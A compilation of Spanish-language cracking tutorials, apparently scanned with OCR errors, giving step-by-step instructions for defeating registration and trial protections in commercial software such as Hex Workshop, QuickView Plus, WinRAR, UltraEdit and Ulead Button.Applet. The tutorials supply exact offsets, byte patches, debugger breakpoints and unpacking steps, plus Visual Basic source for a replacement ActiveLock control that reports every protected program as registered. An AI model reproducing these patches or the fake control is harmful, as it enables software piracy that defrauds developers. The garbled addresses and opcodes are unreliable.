en el offset E280 ,en lugar de 74 74 poner 90 90 
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Introducción 


M 


Al Atake 


Paso 1. Ejecuta HWORKS32.EXE 


Paso 2. Haz Click en Help, pulsa About HEX Wo.. 


Paso 3. Introduce cualquier código pra obtener el mensaje de error (Deberías apuntar el mensaje) y sal del 
programa. 


Paso 4. Ejecuta el Comandante Norton, ve al directorio de HWS.. 


Paso 5. Copia HWORKS32.EXE a HWORKS32.EXX (como copia de seguridad) y copia 
HWORKS32.EXE a 1.EXE (para descompilar con el W32Dasm) 


Paso 6. Ejecuta W32Dasm y desensambla 1.EXE. 


Paso 7. Una vez desensamblado, haz click en FIND TEXT, introduce "You have entered an" 
(El mensaje de error que habías apuntado), encuéntralo. (No lo encontrarás en la ventana de String Data 
Reference) 


Paso 8. Ahora deberías estar viendo esta línea: 


Name: DialogID_0075, * of Controls=003, Caption:"Registration Unsucce.. 
001-ControlID:FFFF, Control Class:""Control Text:"You have entered an.. 
002-ControlID:FFFF, Control Class: ""Control Text:"Please confirm you.. 


Paso 9. Bien, bien,ahora sabes que es lo que ControlID usará cuando se introducen códigos erróneos, 
Haz Click en FIND TEXT, escribe "dialogid_0075" y deberás encontrar: 


* Possible reference to DialogIlD_0075 
:0041E233 6A75 push 00000075 
:0041E235 8D8D10FFFFEF lea ecx, dword ptr [ebp+FF10] 


Paso 10. Ahora busca la última comparación del tipo CMP, JNE, JE, etc anterior al mensaje de error. Ve 
subiendo hasta encontrar: 


:0041£E145 837DEC00 cmp dword ptr [ebp-14], 00000000 
:0041E149 0F8479000000 je 0041E1C8 
:0041E14F 8B8DFCFEFFEFF mov ecx, dword ptr [ebp+FEFC] 


Paso 11. Ahora vemaos que pasa si reeemplazamos "je" with "¡ne". 

Asegúrate que la barra de color verde está en:0041E149 0F8479000000 je 0041E1C8 

Deberías ver la "Offset address" en la parte de debajo de la pantalla, más o menos algo así como QOffset 
0001D549h. 

Es donde podrás parchear el archivo y renombrarlo a HWORKS32.EXE. 


Paso 12. Vuelve al Comandante Norton, ejecuta HIEW HWORKS32.EXE, pulsa F4 para seleccionar el 
"Decode mode (ASM)", pulsa ES e introduce 1D549. Leerás: 


0001D549: 0F847900 je 00001D5C6 === =====-=-= (1) 
0001D54D: 0000 add [bx] [sil,al 
0001D54F: 8B8DFCFE mov cx, [di] [OFEFC] 


Paso 13. Y ahí podrás cambiar los bytes, pulsa F3, escribe 0F85, pulsa F9 para actualizar el 
HWORKS32.EXE. Sal de HIEW. 


Paso 14. Ejecuta HWORKS32.EXE y escribe cualquier código, ¿Te funciona? 

¿1¿NO?!2 

De acuerdo, vuelve al NC. Copia HWORKS32.EXX a HWORKS32.EXE. 

(Por eso habíamos hecho la copia de seguridad). Vuelve a W32Dasm, justo al punto donde lo dejamos (en 
0041E145). 


Paso 15. Pulsa F3 para buscar otra vez "dialogid_0075", y encontrarás: 


* Possible reference to DialogID_0075 
:00430ADD 6A75 push 00000075 
:00430ADF 8D8D10FFFFEF lea ecx, dword ptr [ebp+FF10] 


Paso 16. Ahora busca la última comparación del tipo CMP, JNE, JE, etc anterior al mensaje de diálogo de 
error. Ve subiendo hasta encontrar: 


:004309EF 837DEC00 cmp dword ptr [ebp-14], 00000000 
:004309F3 0F8479000000 je 00430A72 
:004309F9 8B8DFCFEFFEFF mov ecx, dword ptr [ebp+FEFC] 


Paso 17. Ahora vemaos que pasa si reeemplazamos "je" with "jne" 

(Debería funcionar) Muévete a :004309F3 0F8479000000 je 00430472. 

Deberías ver la "Offset address" en la parte de debajo de la pantalla, más o menos algo así como QOffset 
0002FDF3h. 

Es donde podrás parchear el archivo y renombrarlo a HWORKS32.EXE. 


Paso 18. Vuelve al Comandante Norton, ejecuta HIEW HWORKS32.EXE, pulsa F4 para seleccionar el 
"Decode mode (ASM)", pulsa ES e introduce 2FDF3. Verás: 


0002FDF3: 0F847900 je 00001D5C6 === -==-==-=-= (1) 
0002FDF7: 0000 add [bx] [si],al 
0002FDF9: 8B8DFCFE mov cx, [di] [OFEFC] 


Paso 19. Y ahí podrás cambiar los bytes, pulsa F3, escribe 0F85, pulsa F9 para actualizar el 
HWORKS32.EXE. Sal de HIEW. 


Paso 20. Vuelve otra vez a HWORKS32.EXE y escribe lo que te apetezca, ¿Funciona? 
¡Felicidades! Has crackeado el HEX WorkShop 2.51! 


> , 
Ve 
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Introducción 


CURSO DE CRACKING 
1% Parte 
COMO CRAQUEAR EL QUICKVIEW PLUS V.4.0 


Necesitaremos los siguientes programas 
W32Dasm 8.5 o superior 


Hacker's View 5.24 o superior 
Norton Commander o Windows Commander 


Win 


Al Atake 


Paso 1. Ejecuta ORDER32.EXE 


Paso 2. Haz Click en "$49 Single User License" (O si quieres defraudar todavía más, en $59), y pulsa 
ACEPTAR, después UNLOCK BY PHONE. 


Paso 3. Introduce cualquier codigo para obtener el mensaje de error. (Apunta el mensaje) y sal del 
progrma pulsando CANCELAR 


Paso 4. Ejecuta el Comandante Norton y ve al directorio del QVP. 


Paso 5. Renombra el archivo ORDER32.EXE a ORDER32.EXX (como copia de seguridad)y haz lo 
mismo con ORDER32.EXE a 1.EXE (para usar con W32Dasm) 


Paso 6. Ejecuta W32Dasm y desensambla 1.EXE. 


Paso 7. Una vez desensamblado, haz click en STRING DATA REFERENCE (si no lo encuentras, mejor 
dedícate a criar geranios), busca la cadena (string) "You have entered an incorrect code. Please check 
your entry” 

(¿te suena?), haz doble click sobre ésta. 


Paso 8. Cierra la ventana SDR, y muévete por la pantalla hasta encontrar esta línea: 


* Possible reference to String Resource ID=00041: "You have entered... 
:004049F8 6A29 push 00000029 
:004049FA FF353CCE4000 push dword ptr [0040CE3C] 


Paso 9. Bien, ahora deberías buscar la última comparación tipo CMP, JNE, JE, TEST, etc antes de la 
cadena de error. Ve subiendo hasta encontrarla: 


:004049CD 755A jne 00404A29 

* Possible reference to String Resource ID=00032: "You must select... 
:004049CF 6420 push 00000020 

* Possible reference to String Resource ID=00040: "Unlock Error" 


Paso 10. Ajá¡ ahora tú y yo sabemos donde va a parar cunado introducimos un número de serie 
incorrecto. 

Y ahora, ¿por qué no? Vamos a ver si sigue funcionando cuando reemplazas "¡ne" por "je". 
Estate seguro que la barra de color verde está en: :004049CD 755A jne 00404A29 

Ahora deberías ver la dirección Offset en la parte inferior de la pantalla, algo así como Offset 
00003DCDHh. 

Ahí es donde puedes renombrarlo en ORDER32.EXE. 


Paso 11. Vuelve al Comandante Norton, ejecuta HIEW ORDER32.EXE, pulsa F4 para seleccionar 
descodificar con Decode mode (ASM), pulsa F5 e introduce 3DCD. Deberías ver algo como: 


00003DCD: 755A jne 000003E29 
00003DCF: 6A20 push 020 
00003DD1: FF15 call w, [di] 


Paso 12.Aquí es donde puedes cambiar los bytes, pulsano F3, introduciendo 74 y pulsando F9 para 
actualizar ORDER32.EXE a su nueva y "mejorada versión". Sal de HIEW. 


Paso 13. Ejecuta ORDER32.EXE e introduce el código que te apetezca. Voilá! Tu solito has crackeado 
QVP 4.0! (0 al menos eso es lo que le dirás a tus amigos :-) 
¡Quieto! Y que pasa si introduces los códigos reales? Te saldrá la ventana de error¡ ¿Qué hacemos? 


Paso 14. :)Vuelve a ejecutar HIEW ORDER32.EXE, pulsa F4, selecciona "Decode", pulsa FS e introduce 
3DCD. Pulsa F3, introduce EB, pulsa F9. El programilla ahora saltará directamente a la ventana de 


desbloqueo. 
VA 
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Introducción 


Es necesario registrarse para tener acceso a algunas opciones, como "Authenticity 
Verification". 


Lo ideal sería analizar más a fondo la rutina que calcula la clave en función del 
nombre, y hacer un generador de claves. 

Pero el método más rápido es interceptar la rutina y provocar el valor que 
queremos que devuelva. ;-) 


Win 


Al Atake 


Arrancar el Pc con el Softlce 3.22, con el fichero WinIce.Dat debidamente configurado. 
(Ver "Introducción al Softlce" en la sección de Documentoz Genéricoz para más información) 


Ejecutar el programa WinRAR, y seleccionar la opción para registrarse. 
Introducir cualquier nombre en Registration (AV) Text (Ej:ECD IntroCracking) 
Introducir cualquier clave en Registration Code (Ej:222333) 


Pulsar Ctrl+D para ir al Softlce. 


Una de las maneras en que el programa puede leer la información que hemos tecleado, es con 
GetWindowTextA o con GetDlgltemTextA (lo de la A al final es para los programas 32 bits) 
Así que vamos a poner un par de BreakPoints para estas instrucciones : 


BPX getwindowtexta 
BPX getdlgitemtexta 


Pulsamos Ctrl+D para volver al WinRAR, y le damos al botón OK. 


Apareceremos en el Softlce, y desactivamos los BreakPoints con BD * 

Vamos haciendo F12 hasta llegar al código del WinRar. (Saltándonos el código del Kernel, User...) 
Llegaremos a :4139A6, después de la llamada a User32!GetDlgltemTextA 

El valor guardado (el nombre) está en [EBP-64], que podemos ver haciendo D ebp-64 


Avanzamos con varios Fl0, hasta la siguiente llamada a GetDlgltemTextA. 
El valor (la clave) queda en [EBP-AC] (que es lo mismo que [EBP+FFFFFE54]) 


Unos pocos F10 más, y veremos : 


:004139E9 8D9554FFFFEF lea edx, dword ptr [ebp+FEFFFFEF54] 
:004139EF 52 push edx ¡; la clave (222333) 

:004139F0 8D4D9C lea ecx, dword ptr [ebp-64] 

:004139F3 51 push ecx ¡¿ el nombre (ECD IntroCracking) 
:004139F4 E80369FFEF call 0040A2FC ¿ Validar_Registro 
:004139F9 83C408 add esp, 00000008 

:004139FC 85C0 test eax, eax 

:004139FE 752F jne 00413A2F ¡; Salta si OK (AX=1) 


Así pues, la rutina que valida el nombre y la clave introducidas está en :40A2FC 
Acaba en :40A596, y devuelve AX=1 si OK, y AX=0 si no ok. 
Pero además, en la posición de memoria [00425758] también guarda ese valor. 


Así que vamos a rediseñar esa rutina, para hacerla funcionar más rápido. ;-) 
Lo que la rutina debe hacer es devolver un valor en AX y en [425758], todo lo demás sobra. ;-) 
Y si ese valor es 1, mejor que mejor. ;-DD Por ejemplo : 


:0040A2FcC 33C0 xor eax,eax 
:0040A2FC 40 inc eax 
:0040A2FC A358574200 mov dword ptr [00425758],eax 


:0040A2FcC C3 ret 


Si aplicamos estos cambios antes de continuar la ejecución, nos dirá que "Correct Registration". 
Pero si cerramos el WinRar, y lo volvemos a abrir, nos dirá que "Evaluation Copy”. 
Así que hay que hacer los cambios efectivos en el fichero WinRar95.exe 


Con un editor hexadecimal, vamos a la posición 98FC, y ponemos encima de lo que haya : 
33C040A358574200C3 
Después de salvar, ya tenemos el WinRAR "optimizado" ;-) 


Si todavía no hemos hecho la opción de Registrarse con el parche, nos saldrá lo de "Evaluation 
Copy". 
Tan sólo hacer el Registro con el nombre y clave que queramos, y yatá ;-) 


También podeis probar si habeis aplicado bién el parche, seleccionando un fichero para comprimir 
con el WinRAR, y activar la casilla de "Authenticity Verification”. 
Si os deja es que está todo Ok. 


Nota : Si la rutina que valida el registro (que va de :40A2FC hasta :40A596) hiciera algo más de lo 
que yo he supuesto, y por tanto no se pudiera parchear tan alegremente com he hecho, la solución 
entonces sería poner ECX=1 en :40A56F 

Como no acostumbro a usar el WinRar, no lo he podido comprobar al 100%. Ya me diréis... 


- 
Vi 
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Introducción 


El objetivo sera que no caduque nunca el programa. 


> 
We 


Al Atake 


Una vez instalado el programa, cambiaremos la fecha del ordenador 
hasta ponerla en el dia 22 de evaluacion. 

Saldra un mensaje diciendonos algo asi como que vayamos pensando 
en registrarlo y nos dejara usar el programa hasta que lleguemos a 40 
dias. 


Cambiar la fecha del ordenador hasta ponerla en el dia 41 o superior. 
Saldra un mensaje diciendonos algo asi como que el periodo de 
evaluacion a terminado y que nos registremos, cerrandose el programa. 


Ahora, pulsaremos CTRL+D para entrar en el Softlce y pondremos el 
siguiente BreakPoint: 


bpx MessageBoxA 
Pulsar F5 para volver a Windows y ejecutar el programa. 


Este BreakPoint, hara que se pare la ejecucion justo en el momento 
que vaya a salir la ventana con el mensaje de que el periodo de 
evaluacion a terminado. 


Saltaremos automaticamente al Softlce, pulsar F12 y apareceremos en 
Windows con el mensaje de aviso en pantalla. 
Pulsar el boton de Aceptar y saltaremos otra vez al Softlce. 


Pulsar F12 y F12 otra vez para entrar en la parte de codigo 
perteneciente al propio programa, justamente en la siguiente linea que 
saco el mensaje de aviso. 


Deberemos de tener en pantalla el siguiente codigo: 


* Reference To: MFC42.MFC42:NoName0296, 
Ord:07F4h 

| 

:0040D60E E8D56E0100 Call 004244E8 

:0040D613 6A01 push 00000001 

:0040D615 8B45E8 mov eax, dword ptr [ebp-18] 
:0040D618 8B08 mov ecx, dword ptr [eax] 
:0040D61A E88175FFFF call 00404BA0O <-- 
Comprobar si esta registrado 

:0040D61F 85C0 test eax, eax 

:0040D621 7510 jne 0040D633 <-—- Salto si esta 


registrado 

:0040D623 8B4DEC mov ecx, dword ptr [ebp-14] 
:0040D626 E845F5FFFF call 0040CB70 

:0040D62B 85C0 test eax, eax 

:0040D62D 0F8400FEFFFF Je 0040D433 


* Referenced by a (U)nconditional or 
(C)onditional Jump at Address: 
| :0040D621(C) 


:0040D633 8B4DEC mov ecx, dword ptr [ebp-14] 


* Reference To: MFC42.MFC42:NoName0295, 
Ord: 0A4Bh 


:0040D636 E8A76E0100 Call 004244E2 <-— Mensaje 
de error 

:0040D63B 6401 push 00000001 <--— Aparecemos 
aqui 

:0040D63D 8B4DEC mov ecx, dword ptr [ebp-14] 


Si miramos hacia arriba el codigo, veremos que en la linea 
:0040D61A, es donde se comprueba si el programa esta registrado o 
no, devolviendo en EAX un valor distinto de O si es correcto. 


Ahora ya podemos desactivar el BreakPoint que teniamos, escribiendo: 
bd 00 
y pulsar F5 para volver a Windows. 


Ahora ya sabemos donde se comprueba si el programa esta registrado 
O no y que salto hace si es correcto. 

La solucion es que siempre haga el salto de la linea :0040D621 y esto 
se conseguira cambiando el JNE 0040D633 por un JMP 0040D633. 


Arrancar el Hex Workshop y buscar la siguiente cadena: 
ES 81 75 FF FF 85 C0 75 10 


y sustituirla por: 


ES 81 75 FF FF 85 C0 EB 10 


Salvar las modificaciones y el programa no caducara nunca. 


> 
Wi 
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ae 
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Introducción 


Nada mas inicirar comprueba la fecha y te muestra una nag screen para que te 
registres. 
Si la fecha caduca se acabo. 


Al Atakerrrr 


Primer contacto: 


Vamos a ver que pasa si pasamos la fecha limite, cambiamos la fecha y vemos que 
nos sale un mensaje diciendo que ha expirado. 

Muy bien, buscaremos la cadena EXPIRED 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
[:0045A71C(C) <-- condicion que ha de cumplir para caducar 

| 

:0045A72A ESO6BEFAFF call 00406535 

:0045A72F 391D206D4D00 cmp dword ptr [004D6D20], ebx 
:0045A735 758A jne 0045A6C1 

:0045A737 A1040E4D00 mov eax, dword ptr [004D0E04] 
:0045A73C 894510 mov dword ptr [ebp+10], eax 

:0045A73F 894514 mov dword ptr [ebp+14], eax 


* Possible Reference to String Resource ID=00068: "UltraEdit 45 Day Evaluation 
time expired!!!!" < -- APRECEMOS AQUI 

| 

:0045A742 6A44 push 00000044 

:0045A744 8D4D10 lea ecx, dword ptr [ebp+10] 

:0045A747 C645FC02 mov [ebp-04], 02 

:0045A74B ESOF3A0200 call 0048315F 


si miramos el codigo un poco mas arriba vemos que se tiene que cumplir la 
condicion de la fila 0045A71C. 
Pues vamos a ver que condicion nos pide. 


Possible StringData Ref from Data Obj ->"Settings" 

| 

:0045A6FD 68F0054D00 push 004D05FO 

:0045A702 ES60030300 call 0048AA67 

:0045A707 A14C6D4D00 mov eax, dword ptr [004D6D4C] 
:0045A70C 2B05546D4D00 sub eax, dword ptr [004D6D54] 
:0045A712 50 push eax 

:0045A713 E8S323C0100 call 0046E34A 

:0045A718 83F82D cmp eax, 0000002D 

:0045A71B 59 pop ecx 

:0045A71C 7FOC jg 0045A72A <--- SETE HA ACABADO EL TIEMPO 
:0045A71E 39944010000 cmp dword ptr [esi+00000144], ebx 
:0045A724 0F8576FEFFFE ¡ne 0045A6A0 


Bueno bueno, que osea que nos mannda a la calle si la fecha es mayor (38), ok pues 
podriamos poner jng pero funcionaria a partir de la fecha caducada a si que mejor 
que no ponga nada cambiamos 7FOC por 9090 osea nop nop XD. 

fin del caducado. 

vamos a por la nag. 

ahora la nag nos dice que nos quedan 0 dias, pero hay sigue dando la lata, vamos a 
cepillarnolas. buscamos una referencia por ej unregistered, el primero que nos 
localiza es: 

Name: DialogID_006E, + of Controls=008, Caption:"", ClassName:"" 

001 - ControlID:FFFF, Control Class:"STATIC" Control Text:"This is an 
unregistered copy of UltraEdit-32. Use of this program should be o" 

002 - Control1D:0080, Control Class:"STATIC" Control 


ahora buscamos una referencia a DialoglD_006E 
y vemos: 

* Referenced by a CALL at Address: 
|:0045A644 <---- UNA LLAMADA 


| 
:0040929F FF742404 push [esp+04] 


* Possible Reference to Dialog: DialoglD_006E 


* Possible Reference to Dialog: DialoglD_0069, CONTROL_ID:006E, "" 
| 


* Possible Reference to String Resource ID=00110: "Select directory to search." 
| 

:004092A3 6A6E push 0000006E 

:004092A5 E84A520700 call 0047E4F4 

:004092AA F7D8 neg eax 

:004092AC 1BCO0 sbb eax, eax 

:004092AE F7D8 neg eax 

:004092B0 C20400 ret 0004 


EOS 


VAMOS A 0045A644 


EEES 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:0045A5AC(C) <--- UNA CONDICION UMMM HABRA QUE VER QUE ES 
| 

:0045A639 FF761C push [esi+1C] 

:0045A63C 8DBE28010000 lea edi, dword ptr [esi+00000128] 

:0045A642 8BCF mov ecx, edi 

:0045A644 ES56ECFAFF call 0040929F <-- MUESTrA LA NAG 

:0045A649 85CO0 test eax, eax 

:0045A64B 7506 ¡ne 0045A653 

:0045A64D 899E44010000 mov dword ptr [esi+00000144], ebx 


EOS 


EOS 


:0045AS5AS5 8B7004 mov esi, dword ptr [eax+04] 

:0045ASAS 8B4514 mov eax, dword ptr [ebp+14] 

:0045ASAB 48 dec eax 

:0045ASAC 0F8487000000 je 0045A639 <-- ANDA ESTA AQUÍ, ¿ QUE PASA SI 
CAMBIO EL JE x JNE? NO NAG 

:0045A5B2 48 dec eax 

:0045A3B3 0F8508010000 ¡ne 0045A6C1 

:0045A5B9 391D206D4D00 cmp dword ptr [004D6D20], ebx 

:0045ASBF 7413 je 0045A5D4 

Podriamos tambien eliminar la nag poniendo el famoso 90 en la lina 0045a5Sac, pero 
para que malgastar teclas XD, bastara con cambiar 0F8487000000 por 
0F8587000000 

un saludo “DeeJay? 
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Programa ActiveLock 1.5 y VBCodeLibrary 3.0.0 | W9S / W98 / NT 
eS Utilidad GRATUITA para crear programas shareware osea NO gratuitos. Y como 
Descripción E : dd b a ] 
ejemplo practico una libreria de codigo Visual Basic. 


Tipo ¿¿¿Freeware??? y Shareware 


http://www.insite.com.br/—nferraz/activelock/ y 


Url 


http://www.eastwood60.freeserve.co.uk 


OCX para crear programas Trialware, Clippleware y Demos, sin limitacion. 
Protección add : 
Nagscreen pidiendo el dichoso password. 
Dificultad ¿1) Principiante,? 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
Herramientas Visual Basic 5+, Smartcheck 6 (opcional) 


07 Hacer que todos los programas que usan este sistema (¿5000?) sean más rapidos 
Objetivo 
y queden a nuestra merced. 
Cracker Paco 
Fecha 3 de septiembre de 1999 


Introducción 


Se trata de un ocx escrito en VisualBasic 5 y 6 GRATUITO, para hacer de 
una forma sencilla (cierto) y segura (ya veremos) programas NO gratuitos para 
distribuirlos después por ahí. Es todo un detalle del autor crear dos versiones 
distintas para ahorrar varios megas de instalables al sufrido usuario de internet, 
victima del loco programador de VB creador de programas 15 megas. 


Con el OCX se pueden crear programas que caduken después de usarlos 
varias veces, depués de unos días, con opciones desabilitadas... y todo con una 
proteccion aparentemente buena, y con gran sencilled... 


Como queria probar si realmente funcionaba el invento, me decidi a utilizar 
uno de los ¿5000? programas que lo usan, pero... sólo encontré el VBCodeLibray, 
algo asi como una base de datos con las funciones que más te gusta usar... 


Nuestro objetivo será conseguir un OCX que nos permita usar los programas 
que lo usan para protegerse... 


¿¿¿Complicado???, creo que no!!!! 


Al Atake 


Primero vamos a intentar conocerlo un poco, para eso abrimos el Smartcheck y 
ejecutamos el VBCodeLibrary... después de varias horas, sumando una palabra, 
quitando de alli y poniendo por el otro lado el programa nos muestra una ventana 
pidiendo ¿a que no lo adivinas? un pasword..., y claro... simplemente sacamos la 
conclusión, que el grueso de la proteccion se encuentra en el fichero 
nslock15vb6.ocx, y que como tengamos que hacer otra vez este paso sería 
conveniente que aprobechasemos el tiempo contando granos de arroz, descubriendo 
la cura para el Sida... 


Dejamos de lado el programa, y miramos directamente todo lo que nos 
podemos bajar de la página del creador del OCX, para intentar saber como 
funciona... y claro abrimos el Visual Basic para hacer un programa de prueba... y 
vemos que si antes tardó tanto en aparecer la ventana no era sólo culpa del 
Smartcheck... 


Bueno, pensemos, cual podría ser la mejor solución... para que a demas de 
quitar la protección los programas fuesen más rápidos... ya está!. ¿Que pasaría si 
hiciesemos un OCX? que engañase a los programas diciendoles que está 
registrados... No se, no creo que funcione, demasiado evidente para un programa que 
tarda media hora en realizar los calculos... 


Coger el VB y cread un OCX (ActiveX Control), el principal problema con el 
que nos encontramos es saber cuales son todas las funciones que necesitamos para 
engañar a los programas... veamos que sorpresas tiene el VB... 


En el menñu Project, Project Properties, en la pestaña Component, marcamos Binary 
Compatibility, y seleccionamos el OCX que queremos suplamtar... y generamos el 


OCX porque ya hizimos la parte más complicada... 


Pero ohhh, el VB nos dice que si queremos hacer un OCX igual al que teniamos 
antes, tenemos que cambiarle el nombre por: nslockI5vb6, le damos a cancelar, y en 
la pantalla de antes, pero en la primera pestaña hacemos lo que nos manda... y 
volvemos otra vez... y claro, se vuelve a quejar :((( asi que cambiamos el nombre del 
control UserControll a ActiveLock, y volvemos a compilar, y dice que no encuentra 
PropertyPagel, bueno, y añadimos una pagina de propiedades que se llame 
PropertyPagel... y como no... compilamos otra vez... y seguimos añadiendo mas 
paginas de propiedades, segun nos va diciendo el VB... 


Despues de añadir PropertyPagel, PropertyPage2 y PropertyPage3, nos dice que 
falta una función, por lo que cogemos la definición y la pegamos en el código del 
UserControl que tenemos y seguimos compilando... hasta que nos diga que la 
funcion About es distinta !!y eso que la acabamos de pegar!!! 

El problema se encuentra, en que esta es una función especial, por lo que tenemos 
que indicarle al VB que esta es la funcion que se llama cuando se muestra la ventana 
de Acerca De, asi en el menu, Tools, Procedure Atibutes, seleccionamos la función y 
en Procedure ID le decimos que es la de Acerca de... 

Y seguimos compilando... hasta que al fin se compila... ya está al fin tenemos un 
OCX que puede ser reemplazado por el original... pero para que funcione, tenemos 
que escribir algún codigo en las funciones, algo así... 


Option Explicit 


Property Get Counter() As Long 
Counter = 10 
End Property 


Property Get UsedDays() As Long 
UsedDays = 1 
End Property 


Property Let LiberationKey (ByVal RHS As String) 
' Not remove 
End Property 


Property Get SoftwareCodelength() As Integer 
SoftwareCodelength = 8 
End Property 


Property Get LastRunDate() As Date 
LastRunDate = DateAdd("d", 30, Date) 
End Property 


Property Let SoftwareCodelength (ByVal RHS As Integer) 
' Not remove 
End Property 


Property Get RegisteredUser () As Boolean 
RegisteredUser = True 
End Property 


Property Get SoftwareCode() As String 
SoftwareCode = "12345678" 
End Property 


Property Let SoftwareName (ByVal RHS As String) 
' Not remove 
End Property 


Property Get SoftwareName() As String 
SoftwareName = "wkt!" 
End Property 


Property Let Password (ByVal RHS As String) 
' Not remove 
End Property 


Property Get Password() As String 
Password = "12345678" 
End Property 


Sub About () 
MsgBox "This is the Foo ActiveLock!!", vbInformation 
End Sub 


Property Get LiberationKeylLength() As Integer 
LiberationKeyLength = 8 
End Property 


Property Let LiberationKeyLength (ByVal RHS As Integer) 
' Not remove 
End Property 


Y yata!! como veis al final lo que parecia una 
protección tecnicamente muy buena y estudiada fallaba en 
la base... por ultimo tened en cuenta, que debeis tener 
otro OCX pero que se llame nslock1l5vb5 para los 
programas que usen la versión de VB5 y que tal vez algún 
programa verifique que el tamaño de las claves es el 
correcto, por lo que debereis intentar sacar el tamaño 
adecuado, bien por prueba-error o con el Smartcheck o 
cualquiera otra utilidad que se os ocurra! 


Hasta la proxima, 


- 
Vi 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Programa Ulead Button.Applet 1.0 | W95 / W98 / NT 
| Descripción |El programa te permite erear Applets 
A 


objetivo [Queel programa mo caduque. 


Introducción 


Este tutorial enseña como quitar la protección VBOX que tiene el Ulead 
Button.Applet 1.0 

La protección VBOX actúa como un compresor y además añade un tiempo limite 
para que el programa funcione. Así pues el programador del programa no tiene que 
currarse esta parte. 


Nota: Si no sabes como descomprimir manualmente un fichero, será mejor que te 
leas primero algún tutorial sobre eso. 


Al Atake 


Empecemos pues... 
Carguemos a nuestro amigo en el SoftICE y enseñémosle quien es el que manda!!! 
Bien, nos encontramos al principio del programa: 


14F:004F1000 PUSH DWORD PTR [ESP+0C] 
14F:004F1004 PUSH DWORD PTR [ESP+0C] 
14F:004F1008 PUSH DWORD PTR [ESP+0C] 
14F:004F100C PUSH FCF52370 
14F:004F1011 PUSH FCB06073 
14F:004F1016 PUSH FCF520AC 


0 
0 
0 
0 
0 
0 
014F:004F101B PUSH FCF52056 
0 
Pp 
0 
0 
0 


14F:004F1020 CALL [00454178] <-- Descomprime parte del 
rograma. 


4F:004F1026 PUSH FEFFFEFEF 
14F:004F102B CALL EAX <-- Continua con lo suyo. :)) 
14F:004F102D RET 000€ 


En la línea 014F:004F1020 se ejecuta CALL [00454178], que es una llamada a una 
función del compresor VBOX que descomprime parte del programa y devuelve en 
EAX la dirección de memoria donde el programa debe continuar. Así que 
inspeccionemos que se hace ahí, pulsemos FS en el CALL EAX. 

Nos encontramos con lo siguiente: 


14F:004F1026 PUSH FEFEFFFFEF 

14F:004F102B CALL EAX <-- Salta al programa original. 
:)) 
014F:004F102D RET 000€ 


014F:004F1000 PUSH DWORD PTR [ESP+0C] 

014F:004F1004 PUSH DWORD PTR [ESP+0C] 

014F:004F1008 PUSH DWORD PTR [ESP+0C] 

014F:004F100C PUSH 27292979 

014F:004F1011 PUSH 510C3BF6 

014F:004F1016 PUSH 9655349C 

014F:004F101B PUSH E79A2ACE 

014F:004F1020 CALL [0045315C] <-- Función Importante. 
0 

0 


El código es muy parecido. En la línea 014F:004F1020 hace una llamada a la 
librería VBOX, la cual comprueba si ya han pasado los 15 días y si no han pasado, 
termina de descomprimir el programa original. Luego muestra una Nag muy fea... 
Como antes, tambien se devuelve en EAX donde debe continuar el programa: 
devolverá la dirección del programa original si no han pasado los 15 dias y una 
dirección para salir del programa si ya han pasado... 


Asi que ejecutemos paso a paso el programa hasta la linea 014F:004F102B, en la 
cual vamos a cambiar unas lineas, para eso introducimos el comando a, para 
ensamblar y escribimos ¡mp eip. Esto provocara que el programa quede en un bucle 
infinito (Acuerdate antes de apuntarte el valor del registro EAX, puesto que lo 
necesitaremos mas tarde). 

Ahora le toca el turno al ProcDump. Cargamos el ProcDump y elegimos la opción 
de Dump (FULL). Guardamos el fichero con el nombre que queramos (este fichero 
contiene el codigo original, ya descomprimido). Por lo que solo nos queda modificar 


la cabecera para que lo que se ejecute sea el codigo original y no el del 
descompresor. 

Para eso elegimos la opción de PE Editor y cargamos nuestro fichero. Debemos de 
cambiar el "Entry Point” para que apunte al codigo original, de tal forma que Base 
Image + Entry Point = El valor del registro EAX (te lo habias apuntado, no?). 
Sustituyelo y pulsa OK!! 

Ahora ejecuta el fichero y ya tienes Ulead Button.Applet 1.0 para rato... :)) 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Particle Fire screensaver v1.la | WO9S / W98 / NT 
A 
MA Ma e as 

Url Ihttp://www.longbowdigitalarts.com/particlefire.ml 


Introducción 


El salvapantallas es vistoso, aunque es el primero que veo que pretenden hacerte 
pagar por él (hay gratis a patadas en internet), aunque bueno, cada cual que haga lo 
que quiera; si realmente te gusta, creo que solo son unos 10$... Para registrarse, hay 
que introducir un número en la pantalla de configuración del salvapantallas; si no, al 
cabo de 7 días, cuando el salvapantallas lleva un par de minutos, comienza con los 
clásicos mensajitos tipo "regístrate porfa". Nunca he visto un tutorial sobre un 
screensaver, así que ya que lo conseguí con este, he pensado en contarlo y de paso 
ilustrar la aplicación del método 'bpx RegQueryValueExA' para programas que 
interactuan poco o nada con el usuario a la hora de registrarse pero que leen datos 
tipo s/n desde el registro de Windows (este es su punto de contacto con el mundo 
'real'). Dado que me considero un principiante, he tratado de escribir esto a un nivel 
bastante bajo, aunque he desarrollado dos métodos de cracking, uno para 
principiantes (parchear) y uno para amateurs (keygen); es por estos motivos que este 
documento es un poco largo. Sin embargo, la gente más avanzada podrá leerlo de 
corrido (o leer directamente el 'briefing' (resumen) del final de todo). 


Al Atake 


1. Familiarizándonos 


Bien, nuestro primer punto de partida es familiarizarnos con el programa y su mecanismo de 
protección. Éste consiste en la introducción de un número en la ventana de configuración del 
protector de pantalla (podemos acceder desde Panel de control / Propiedades de pantalla / Configurar 
protector pantalla, o bien desde el menú contextual que aparece al pulsar el botón derecho sobre el 
fichero de ParticleFire). Si el número no es el correcto, y ya han pasado 7 días desde que lo 
instalamos, veremos mensajes molestos al cabo de un par de minutos de iniciarse el screen saver 
(adelantad 10 días el calendario para verlos). 


Así que tenemos que solucionar eso... pero para nuestra desdicha, constatamos que, tras introducir un 
número (por ejemplo 12345) y aceptar, no aparece ningún mensaje que valide o invalide el código 
introducido. Sin embargo, si volvemos a entrar, nuestro número sigue ahí. Si hacemos algún 
experimento, probando números y entrando y saliendo de la configuración, llegaremos a la 
conclusión de que, posiblemente, el serial num debe ser de 10 cifras (o menos) y formado 
exclusivamente por números (de otro modo, trunca o pone a cero la expresión introducida cuando 
volvemos a entrar a "configurar”). 


